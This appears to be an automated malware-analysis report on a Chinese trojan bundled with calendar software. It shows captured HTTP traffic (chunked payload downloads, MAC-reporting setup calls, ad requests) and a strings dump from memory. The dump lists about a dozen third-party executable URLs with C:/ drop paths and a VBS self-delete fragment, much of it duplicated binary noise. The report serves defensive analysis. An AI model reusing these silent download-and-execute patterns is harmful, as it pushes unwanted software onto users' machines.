Expires: Mon, 14 Jul 2014 05:41:35 GMT
Cache-Control: max-age=2592000
Last-Modified: Sat, 14 Jun 2014 05:41:35 GMT
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=2252800-2457600
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 174816
Content-Type: application/octet-stream
Content-Range: bytes 2252800-2427615/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:22 GMT
<<
<<< skipped >>>
GET /api/GetConfig.ashx HTTP/1.1
User-Agent: oemfhsli
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:00:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 330
{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncount":"1","setupcode":"ae9b8922d6184874896f5561d8fe0643","showminitab":"1","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabrate":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrdn.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}
GET /api/Setup.ashx?pid=6&psid=12001&setupcode=ae9b8922d6184874896f5561d8fe0643&mac=000c298a8b37&physn=00000000000000000001&bindsoftcount=0 HTTP/1.1
User-Agent: oemfhsli
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 38
{"errno":"1","filter":"1","valid":"0"}
GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:43 GMT
Content-Type: text/plain
Content-Length: 142
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:43 2014
X-XSS-Protection: 0
Set-Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; expires=Sun, 14-Jun-15 09:00:43 GMT; max-age=31536000; path=/; domain=.sogou.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"0".}});
GET /ct?ssi0=257&pvt=1402736450366&t2=1402736450&t1=0&bi=1&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736450&z=9471ea3941afa839&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0M19wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:44 GMT
Content-Type: text/html
Content-Length: 7405
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: SUID=E7F48AC12141900A539C0F3B000F06DC; path=/; expires=Mon, 13 Jun 2016 09:00:43 GMT; domain=sogou.com
Set-Cookie: ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:43 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:44 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.<!--.body{margin:0;background-color:transparent;}..sogou{width:460px; height:60px;position:relative;overflow:hidden;}.a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}..sogou a.normal{}.-->.</style>.</head>..<body>.<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>.<script type="text/javascript">.var iheight = "60";.var fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_preview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460;.. if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||
<<
<<< skipped >>>
GET /ask?id=341269&cb=SOGOU_STAR_SETJSONADSLOT&cxid= HTTP/1.1
Accept: */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=DupiSyllll2FXlDElllllVntR87lllllZYr1iZllll9lllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:45 GMT
Content-Type: text/plain
Content-Length: 160
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:45 2014
X-XSS-Protection: 0
SOGOU_STAR_SETJSONADSLOT({."341269" : {."id":341269,."w":460,."h":60,."m":"MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-",."isf":"0",."cs":"1985823318692344632".}});
GET /ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA- HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://client.fhrlw.com/ad/fixad.html?id=9995
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: inte.sogou.com
Connection: Keep-Alive
Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 14 Jun 2014 09:00:47 GMT
Content-Type: text/html
Content-Length: 7404
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ad=vLpiSyllll2FXlDElllllVntR8DlllllZYr1iZllllGlllllRklll5@@@@@@@@@@; path=/; expires=Mon, 14 Jul 2014 09:00:47 GMT; domain=.sogou.com
Expires: Mon, 26 Jul 1997 08:00:00 GMT
Last-Modified: Sat Jun 14 17:00:47 2014
X-XSS-Protection: 0
<html>.<head>.<title></title>.<style>.<!--.body{margin:0;background-color:transparent;}..sogou{width:460px; height:60px;position:relative;overflow:hidden;}.a.logo{display:block;height:18px;width:26px;text-align:justify;letter-spacing:20px;text-decoration:none;overflow:hidden;cursor:default;position:absolute;bottom:0px;right:0px;}..sogou a.logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_short.png) no-repeat left top;_background:none;}..sogou a.logo:hover{width:78px;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png",sizingMethod="image");background:url(hXXp://p.inte.sogou.com/testgpimg/sogou_icon_long.png) no-repeat left top;_background:none;}..sogou a.normal{}.-->.</style>.</head>..<body>.<iframe id="tanxcmiframe" width="0" height="0" src="hXXp://dspcm.brand.sogou.com/qi" style="display:none"></iframe>.<script type="text/javascript">.var iheight = "60";.var fsize = iheight;.if (iheight >= 30).{. fsize = 30;.}.var mt_preview="0";.if (mt_preview == 1).{.. var height0=60;.. var width0=460;.. if ((width0==120 && height0==600) || (width0==160 && height0==600) || (width0==200 && height0==200) || (width0==250 && height0==250) || (width0==300 && height0==250) || (width0==336 && height0==300) ||
<<
<<< skipped >>>
GET /fhrl/fhrl_0613.exe HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Range: bytes=1638400-1843200
Host: dl2.fhrlw.com
Cache-Control: no-cache
HTTP/1.1 206 Partial Content
Content-Length: 204801
Content-Type: application/octet-stream
Content-Range: bytes 1638400-1843200/2427616
Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT
Accept-Ranges: bytes
ETag: "b50867ae386cf1:4b5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:16 GMT
<<
<<< skipped >>>
GET /api/GetConfig.ashx HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 330
{"errno":"1","bindsoftcount":"0","onlinetimelength":"0","rightdowncount":"1","setupcode":"0d28db4036a945fd9e9761f04cd18d62","showminitab":"1","minitabtimer":"61","poptabtimer":"48","minitabrate":"180","poptabrate":"68","silentonlinetimelength":"130000","closeMiniUrl":"hXXp://cnrdn.com/eYFE","closePopUrl":"hXXp://cnrdn.com/eYFE"}....
GET /Api/GetHoliday.ashx HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 876
{"errno":"1","info":[{"holidayname":"......","holiday":"2014-01-31","restday":"2014-01-31,2014-02-01,2014-02-02,2014-02-03,2014-02-04,2014-02-05,2014-02-06","work":"2014-01-26,2014-02-08"},{"holidayname":"......","holiday":"2014-01-01","restday":"2014-01-01","work":""},{"holidayname":".........","holiday":"2014-04-05","restday":"2014-04-05,2014-04-06,2014-04-07","work":""},{"holidayname":".........","holiday":"2014-05-01","restday":"2014-05-01,2014-05-02,2014-05-03","work":"2014-05-04"},{"holidayname":".........","holiday":"2014-06-02","restday":"2014-05-31,2014-06-01,2014-06-02","work":""},{"holidayname":".........","holiday":"2014-09-08","restday":"2014-09-06,2014-09-07,2014-09-08","work":""},{"holidayname":".........","holiday":"2014-10-01","restday":"2014-10-01,2014-10-02,2014-10-03,2014-10-04,2014-10-05,2014-10-06,2014-10-07","work":"2014-09-28,2014-10-11"}]}....
GET /Api/GetWeather.ashx?province=??&city=?? HTTP/1.1
User-Agent: FhCalendar
Host: client.fhrlw.com
HTTP/1.1 200 OK
Date: Sat, 14 Jun 2014 09:01:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 13
{"error":"0"}
GET /cms.gif?id=40490128&extendata= HTTP/1.1
Accept: */*
Referer: hXXp://dspcm.brand.sogou.com/qi
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: acookie.tanx.com
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: Tengine
Date: Sat, 14 Jun 2014 09:00:46 GMT
Content-Type: image/gif
Transfer-Encoding: chunked
Connection: close
P3P: CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Location: hXXp://dspcm.brand.sogou.com/pixel?tid=E0&ver=1&extendata=
31..GIF89a...................!.......,...........T..;..0..
GET /oemini/info.ini?id=41 HTTP/1.1
User-Agent: oemfhsli
Host: software.fhrlw.cn
HTTP/1.1 200 OK
Content-Length: 997
Content-Type: .ini
Last-Modified: Fri, 13 Jun 2014 08:44:03 GMT
Accept-Ranges: bytes
ETag: "4415c5a0e386cf1:4d6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 14 Jun 2014 09:00:47 GMT
[Info]..FileCount = 1..Rate0 = 100..Rate1 = 70..[File0]..FileName=fhrl_0613.exe..FileDir= fhrl..FileTitle= ..........DocUrl = hXXp://VVV.fhrlw.com/readme.html..urlCount=2..url0=hXXp://dl1.fhrlw.com/fhrl/fhrl_0613.exe..url1=hXXp://dl2.fhrlw.com/fhrl/fhrl_0613.exe....BlockCount=12..BlockSize0=204800..Hash0=31171D0C6216B1555E85D7EC89AF40F1..BlockSize1=204800..Hash1=E1AA7FC27B8979618CF31CD1CF06829B..BlockSize2=204800..Hash2=0C88B5B81B4BCDB92DDD042D79554E5E..BlockSize3=204800..Hash3=3CF42153EC58C3560A92DC9062CA08A6..BlockSize4=204800..Hash4=C3C74AB7AE92A4ACFEEE460E8AEA6C47..BlockSize5=204800..Hash5=0E120EA4DA635D3847459411AC6741E0..BlockSize6=204800..Hash6=D7C70FED90A30442DDAB5FCE3BDDB3A1..BlockSize7=204800..Hash7=654F71158BB01559F0A6D0DAC1318A3E..BlockSize8=204800..Hash8=8843F00044AF9C94DAFB599CFB583203..BlockSize9=204800..Hash9=9DD6488FBA152DA7B3C4DCECDF778EDA..BlockSize10=204800..Hash10=CC86E269AB6B2D6CB588D3F69C7D00B3..BlockSize11=174816..Hash11=CFE74D55CD85196E8D934D31902D9D1B..
<<
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1832:
.text
`.rdata
@.data
.rsrc
.aspack
.adata
t$(SSh
~%UVW
u$SShe
kernel32.dll
user32.dll
EnumWindows
ShellExecuteA
http://software.fhrlw.cn/slience/fhsli_6_12001.exe
C:/fhsli_6_12001.exe
C://fhsli_6_12001.exe
http://ddl.9yfc.com/xxdd_165.exe
C:/xxdd_165.exe
C://xxdd_165.exe
http://wuji.oss-cn-hangzhou.aliyuncs.com/qd/114gglm_016.exe
C:/114gglm_016.exe
C://114gglm_016.exe
http://dl.meinvkankan.com/goodpic_dae_627.exe
C:/goodpic_dae_627.exe
C://goodpic_dae_627.exe
http://lm.beilequ.com/update/365/365weatherIns_137.exe
C:/365weatherIns_137.exe
C://365weatherIns_137.exe
http://home.yj005.com/JBDownload/jbist_[2018].exe
C:/jbist_[2018].exe
C://jbist_[2018].exe
http://down.duomi.com/DuomiMusic_V306.exe
C:/DuomiMusic_V306.exe
C://DuomiMusic_V306.exe
http://down.shuyeer.net/dudu/dudu_b_55279.exe
C:/dudu_b_55279.exe
C://dudu_b_55279.exe
http://dianxinshu.92ttz.com/download/setup_s1002.exe
C:/setup_s1002.exe
C://setup_s1002.exe
http://qq2847894.b.xundisk.net/x1.exe
c:/x1.exe
c://x1.exe
http://boxdown.gtui.cn/KXWebDown/KXWebBox_3317_RBF.exe
C:/KXWebBox_3317_RBF.exe
C://KXWebBox_3317_RBF.exe
bbs.125.la
tem.vbs
fso.DeleteFile("
Set fso = CreateObject("Scripting.FileSystemObject")
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
RASAPI32.dll
GetProcessHeap
WinExec
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegCloseKey
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
COMCTL32.dll
WS2_32.dll
HttpQueryInfoA
HttpSendRequestA
HttpOpenRequestA
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
zcÁ
c:\%original file name%.exe
u.ht*D
@u.Wj
hhctrl.ocx
CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32
File%d
MSWHEEL_ROLLMSG
GDI32.DLL
MSH_SCROLL_LINES_MSG
{X-X-X-XX-XXXXXX}
ddeexec
%s\ShellNew
%s\DefaultIcon
%s\shell\printto\%s
%s\shell\print\%s
%s\shell\open\%s
ECTrans.dll
RegEnumKeyA
RegOpenKeyA
RegDeleteKeyA
RegCreateKeyA
Backup\Backup.ini
KINGSOFTFASTAIT3CHNEXEMUTEX
SOFTWARE\Kingsoft\FastAIT\3.0\ChnEXE
CChnEXEDoc
KPGs\*.KPG
KPGMaker.exe
ChnEXE.chm
KPIs\*.KPI
TEMPPE.WN
.?AVCToolCmdUI@@
.?AVCStatusCmdUI@@
KERNEL32.DLL
,),,,,**((%%!
,),,,,**((%%!
9111111113
9111111113
3111111111
3111111111
411111111111
411111111111
41111111111111
41111111111111
6%%%!!"'- :
6%%%!!"'- :
311111111111111
311111111111111
2611111111111111
2611111111111111
1(%%%%!!"
1(%%%%!!"
9111111111111111
9111111111111111
6%%%%!"'/ #=
6%%%%!"'/ #=
3111111111111111
3111111111111111
((%%%%!!
((%%%%!!
@%%%%!!"
@%%%%!!"
261111111111111111
261111111111111111
6(%%%%!!"
6(%%%%!!"
4111111111111111111
4111111111111111111
3111111111111111111
3111111111111111111
41111111111111111111
41111111111111111111
((%%%%!!"
((%%%%!!"
@(%%%%!!"
@(%%%%!!"
6(%%%%!"
6(%%%%!"
@(%%%!!"
@(%%%!!"
@%%%%!!!
@%%%%!!!
6%%%%!!"
6%%%%!!"
@%%%%!!!"
@%%%%!!!"
](%%%%!!"
](%%%%!!"
6%%%%!!!"
6%%%%!!!"
6%%%%!!!
6%%%%!!!
](%%%%!!!"
](%%%%!!!"
[---'%!!!"
[---'%!!!"
:--'%%!!!
:--'%%!!!
:-'%%%!!!
:-'%%%!!!
-'%%%%!!!
-'%%%%!!!
3%%%%!!!"
3%%%%!!!"
---44--- 42
---44--- 42
`.%%%%!!!"
`.%%%%!!!"
(111.3..3=>
(111.3..3=>
9.333//'.39>
9.333//'.39>
6%%%%!!'
6%%%%!!'
9/31111%.39>
9/31111%.39>
#### # ''
#### # ''
#### ##--
#### ##--
### $$4-
### $$4-
$$$# #-=
$$$# #-=
.%%%%!!!"
.%%%%!!!"
sssh~~h
sssh~~h
].%%%!!!""
].%%%!!!""
6%%%%!!""
6%%%%!!""
6%%%!!!""
6%%%!!!""
}|||}}mm}||sshkmm~~}}
}|||}}mm}||sshkmm~~}}
q___hh__sshkhh__s
q___hh__sshkhh__s
@%%%!!!""
@%%%!!!""
lexeetx
lexeetx
>?@?==?@@@
>?@?==?@@@
].!%!!!""
].!%!!!""
=@@???=@@@
=@@???=@@@
6%%!!!!""
6%%!!!!""
?@@???=@@@
?@@???=@@@
6%%!!!"""
6%%!!!"""
=@@??==?@@@
=@@??==?@@@
6%%!!!""
6%%!!!""
>?@???==@@@@
>?@???==@@@@
9%%!!!""
9%%!!!""
# '(%%%%!!%%!' 2>::444-9
# '(%%%%!!%%!' 2>::444-9
?%%!!!""
?%%!!!""
'%%%!!''''./>24:444 9[
'%%%!!''''./>24:444 9[
3%%!!!""
3%%!!!""
:.%!!!""
:.%!!!""
- 4-.FGHP
- 4-.FGHP
%%9:<'</pre><pre>CJKTAB32.dll</pre><pre>c:\KConvert Files</pre><pre>\/:*?"<>|</pre><pre>%s%s%d%s</pre><pre>:?0_1#"9</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>CHNEXE</pre><pre>2, 0, 0, 2</pre><pre>ChnEXE</pre><pre>ChnEXE.EXE</pre><pre>ChnEXE.Document</pre><pre>ChnEXE Document</pre><pre>(*.*)</pre><pre>%s ...1</pre><pre>%s ...#</pre><pre>%s ...</pre><pre>(*.EXE)|*.exe|</pre><pre>Output.prn$</pre><pre>1, 0, 0, 0</pre><pre>KConvert.EXE</pre><pre>KConvert.Document</pre><pre>\ / : * ? " < > |</pre><pre>(*.*)|*.*||</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>%original file name%.exe_1832_rwx_00566000_00002000:</b><pre>kernel32.dll</pre><pre>user32.dll</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>ole32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>comdlg32.dll</pre><pre>ShellExecuteA</pre><pre>InternetCanonicalizeUrlA</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>FhCalendar.exe_588:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>CNotSupportedException</pre><pre>CCmdTarget</pre><pre>CHttpFile</pre><pre>hhctrl.ocx</pre><pre>Please contact the application's support team for more information.
%%9:<'</pre><pre>CJKTAB32.dll</pre><pre>c:\KConvert Files</pre><pre>\/:*?"<>|</pre><pre>%s%s%d%s</pre><pre>:?0_1#"9</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>CHNEXE</pre><pre>2, 0, 0, 2</pre><pre>ChnEXE</pre><pre>ChnEXE.EXE</pre><pre>ChnEXE.Document</pre><pre>ChnEXE Document</pre><pre>(*.*)</pre><pre>%s ...1</pre><pre>%s ...#</pre><pre>%s ...</pre><pre>(*.EXE)|*.exe|</pre><pre>Output.prn$</pre><pre>1, 0, 0, 0</pre><pre>KConvert.EXE</pre><pre>KConvert.Document</pre><pre>\ / : * ? " < > |</pre><pre>(*.*)|*.*||</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>%original file name%.exe_1832_rwx_00566000_00002000:</b><pre>kernel32.dll</pre><pre>user32.dll</pre><pre>The procedure entry point %s could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>rasapi32.dll</pre><pre>gdi32.dll</pre><pre>winmm.dll</pre><pre>winspool.drv</pre><pre>advapi32.dll</pre><pre>shell32.dll</pre><pre>ole32.dll</pre><pre>oleaut32.dll</pre><pre>comctl32.dll</pre><pre>ws2_32.dll</pre><pre>wininet.dll</pre><pre>comdlg32.dll</pre><pre>ShellExecuteA</pre><pre>InternetCanonicalizeUrlA</pre><pre>1.0.0.0</pre><pre>(http://www.eyuyan.com)</pre><b>FhCalendar.exe_588:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>vSSSh</pre><pre>FTPjK</pre><pre>FtPj;</pre><pre>C.PjRV</pre><pre>tGHt.Ht&</pre><pre>CNotSupportedException</pre><pre>CCmdTarget</pre><pre>CHttpFile</pre><pre>hhctrl.ocx</pre><pre>Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
portuguese-brazilian
portuguese-brazilian
GetProcessWindowStation
GetProcessWindowStation
USER32.DLL
USER32.DLL
operator
operator
